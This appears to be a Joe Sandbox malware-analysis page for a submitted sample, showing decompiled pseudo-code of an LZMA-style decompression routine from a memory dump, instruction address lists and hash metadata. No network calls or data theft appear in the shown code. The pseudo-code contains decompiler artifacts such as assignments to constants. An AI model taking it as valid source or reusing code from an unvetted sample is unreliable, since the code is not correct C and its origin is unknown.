							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x00406a5f
0x00406a66
0x00406a6c
0x00406a72
0x00000000
0x00406a76
0x00406a82
0x00406a82
0x00406a82
0x00406a8b
0x00000000
0x00000000
0x00406a91
0x00000000
0x00406a98
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aad
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406af8
0x00406afb
0x00406b23
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406afd
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b15
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6c
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b71
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b8e
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd4
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727c
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b2
0x004072b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004072bb
0x004072bb
0x004072bf
0x0040746e
0x00000000
0x0040746e
0x004072cb
0x004072d2
0x004072da
0x004072da
0x004072da
0x004072dd
0x004072e0
0x004072e0
0x00000000
0x00000000
0x00406bfe
0x00406c00
0x00406c03
0x00406c74
0x00406c77
0x00406c7a
0x00406c81
0x00406c8b
0x00000000
0x00406c8b
0x00406c05
0x00406c09
0x00406c0c
0x00406c0e
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c26
0x00406c2a
0x00406c31
0x00406c34
0x00406c3b
0x00406c3f
0x00406c47
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4b
0x00406c4e
0x00406c6c
0x00406c6e
0x00000000
0x00406c6e
0x00406c50
0x00406c53
0x00406c56
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00000000
0x00000000
0x00406e9d
0x00406ea1
0x00406ebf
0x00406ec2
0x00406ec9
0x00406ecc
0x00406ecf
0x00406ed2
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406eed
0x00406ef2
0x00000000
0x00406ef2
0x00406ea3
0x00406ea6
0x00406ea9
0x00406eb3
0x00000000
0x00000000
0x00406f07
0x00406f0b
0x00406f2e
0x00406f31
0x00406f34
0x00406f3e
0x00406f0d
0x00406f0d
0x00406f10
0x00406f13
0x00406f16
0x00406f23
0x00406f26
0x00406f26
0x00000000
0x00000000
0x00406f4a
0x00406f4e
0x00000000
0x00000000
0x00406f54
0x00406f58
0x00000000
0x00000000
0x00406f5e
0x00406f60
0x00406f64
0x00406f64
0x00406f67
0x00406f6b
0x00000000
0x00000000
0x00406fbb
0x00406fbf
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fd6
0x00000000
0x00406fd6
0x00406fc1
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00406ffc
0x00406ffc
0x00406fff
0x00407002
0x00407005
0x00407005
0x00407008
0x0040700f
0x00407014
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00407408
0x00000000
0x00407408
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc2
0x00000000
0x00000000
0x00406cc8
0x00406cce
0x00000000
0x00000000
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cff
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d32
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d3b
0x00406d42
0x00406d45
0x00000000
0x00406d4b
0x00000000
0x00406d4b
0x00000000
0x00406d50
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d6f
0x00406d72
0x00406d75
0x00406d75
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d98
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc3
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dc8
0x00406dcf
0x00406dd2
0x00000000
0x00406dd4
0x00000000
0x00406dd4
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406dd9
0x00000000
0x00000000
0x00406e14
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e33
0x00406e36
0x00406e39
0x00406e39
0x00406e3f
0x00406ddd
0x00406ddd
0x00406de0
0x00000000
0x00406de0
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e87
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e8c
0x00406e93
0x00406e96
0x00000000
0x00406e98
0x00000000
0x00406e98
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00406ef5
0x00406ef5
0x00406ef8
0x00000000
0x00000000
0x00407234
0x00407238
0x0040725a
0x0040725d
0x00407267
0x0040726a
0x0040726a
0x00000000
0x0040726a
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407244
0x00407247
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00407328
0x00407328
0x00000000
0x00407328
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x0040724b
0x0040724b
0x0040724e
0x00000000
0x00000000
0x004073e2
0x004073e5
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00407366
0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x004072e6
0x004072e6
0x00000000
0x004072e6
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738a
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073bc
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00406fa9
0x00406fa9
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x0040722d
0x00407462
0x00407484
0x0040748a
0x0040748c
0x00407493
0x00000000
0x00000000
0x00406a91
0x00407499
0x00407499
0x00000000

Memory Dump Source

Source File: 00000000.00000002.1473637529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1473610691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473693993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473725528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473858955.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473888422.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473919824.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1473955731.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1474003822.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
Instruction ID: 0eb50412ba17cbd686f9e43e0b7d85c943a315db4d9133bb66c32ce13943f697
Opcode Fuzzy Hash: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
Instruction Fuzzy Hash: E7813471E04229DBDF24CFA9C8447ADBBB0FB44305F24816ED856BB281C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406E9D Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406E9D() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004074A1))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4)); // executed
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
